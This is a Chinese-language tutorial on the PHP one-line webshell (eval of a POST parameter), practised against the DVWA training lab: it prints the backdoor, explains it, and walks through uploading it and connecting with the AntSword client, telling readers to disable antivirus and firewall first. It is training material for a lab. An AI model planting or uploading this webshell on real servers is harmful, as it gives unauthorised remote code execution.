web渗透_一句话木马(webshell)_dvwa环境

简介: web渗透_一句话木马(webshell)_dvwa环境

一、什么是一句话木马

<?php
@eval($_POST['a']);
?>

先来一段简单的一句话木马,解析下它的构造:

@这个符号的作用是抵制错误提示;eval()函数将接收一个字符串参数,并将这个字符串作为命令语句执行;$_REQUEST['a']从请求参数中得到a这个参数的值,请求参数有两种:GET和POST;a参数名(自定义)


而这段代码的意思就是:用POST方法接收变量a,把变量a里面的字符串当做php代码来执行。


也就是说,你想执行什么代码,就把什么代码放进变量a里,用POST传输给webshell。


二、入侵流程

找到上传点,且成功上传木马进入目标服务器

知道木马在目标服务器中的存储路径

上传的木马能正常运行

三、实验环境

DVWA

windows7

蚁剑

xampp

四、实战技巧

关闭电脑杀毒软件和防火墙

将dvwa的安全等级设置为low

五、实际操作

(一)创建php文件上传

创建php文件,写入一句话木马保存。


image.png

上传到DVWA。

image.png

(二)蚁剑连接

  • 文件路径
  • 变量名

连接webshell。

image.png

连接以后,可以查看服务器

image.png

相关文章
|
3月前
|
JSON 前端开发 JavaScript
|
5月前
|
分布式计算 并行计算 安全
在Python Web开发中,Python的全局解释器锁(Global Interpreter Lock,简称GIL)是一个核心概念,它直接影响了Python程序在多线程环境下的执行效率和性能表现
【6月更文挑战第30天】Python的GIL是CPython中的全局锁,限制了多线程并行执行,尤其是在多核CPU上。GIL确保同一时间仅有一个线程执行Python字节码,导致CPU密集型任务时多线程无法充分利用多核,反而可能因上下文切换降低性能。然而,I/O密集型任务仍能受益于线程交替执行。为利用多核,开发者常选择多进程、异步IO或使用不受GIL限制的Python实现。在Web开发中,理解GIL对于优化并发性能至关重要。
61 0
|
2月前
|
开发框架 安全 .NET
Web安全-一句话木马
Web安全-一句话木马
115 5
|
2月前
|
SQL 安全 测试技术
Web安全-渗透基础
Web安全-渗透基础
30 1
|
2月前
|
开发框架 安全 .NET
Web安全-一句话木马
Web安全-一句话木马
61 3
|
2月前
|
SQL 安全 数据库
Web安全漏洞专项靶场—SQL注入—docker环境—sqli-labs靶场—详细通关指南
Web安全漏洞专项靶场—SQL注入—docker环境—sqli-labs靶场—详细通关指南
339 1
|
3月前
|
存储 安全 网络安全
【Azure 环境】使用Azure中的App Service部署Web应用,以Windows为主机系统是否可以启动防病毒,防恶意软件服务呢(Microsoft Antimalware)?
【Azure 环境】使用Azure中的App Service部署Web应用,以Windows为主机系统是否可以启动防病毒,防恶意软件服务呢(Microsoft Antimalware)?
|
3月前
|
前端开发 JavaScript
【Azure 环境】前端Web通过Azure AD获取Token时发生跨域问题(CORS Error)
【Azure 环境】前端Web通过Azure AD获取Token时发生跨域问题(CORS Error)
|
4月前
|
SQL 安全 中间件
网安零基础入门神书,全面介绍Web渗透核心攻击与防御方式!
Web安全是指Web服务程序的漏洞,通常涵盖Web漏洞、操作系统洞、数据库漏洞、中间件漏洞等。 “渗透测试”作为主动防御的一种关键手段,对评估网络系统安全防护及措施至关重要,因为只有发现问题才能及时终止并预防潜在的安全风险。 根据网络安全调查统计,75%的网络攻击行为都是来自Web应用层面而非网络层面。
|
4月前
|
机器人 Shell 开发者
`roslibpy`是一个Python库,它允许非ROS(Robot Operating System)环境(如Web浏览器、移动应用等)与ROS环境进行交互。通过使用`roslibpy`,开发者可以编写Python代码来远程控制ROS节点,发布和订阅话题,以及调用服务。
`roslibpy`是一个Python库,它允许非ROS(Robot Operating System)环境(如Web浏览器、移动应用等)与ROS环境进行交互。通过使用`roslibpy`,开发者可以编写Python代码来远程控制ROS节点,发布和订阅话题,以及调用服务。

热门文章

最新文章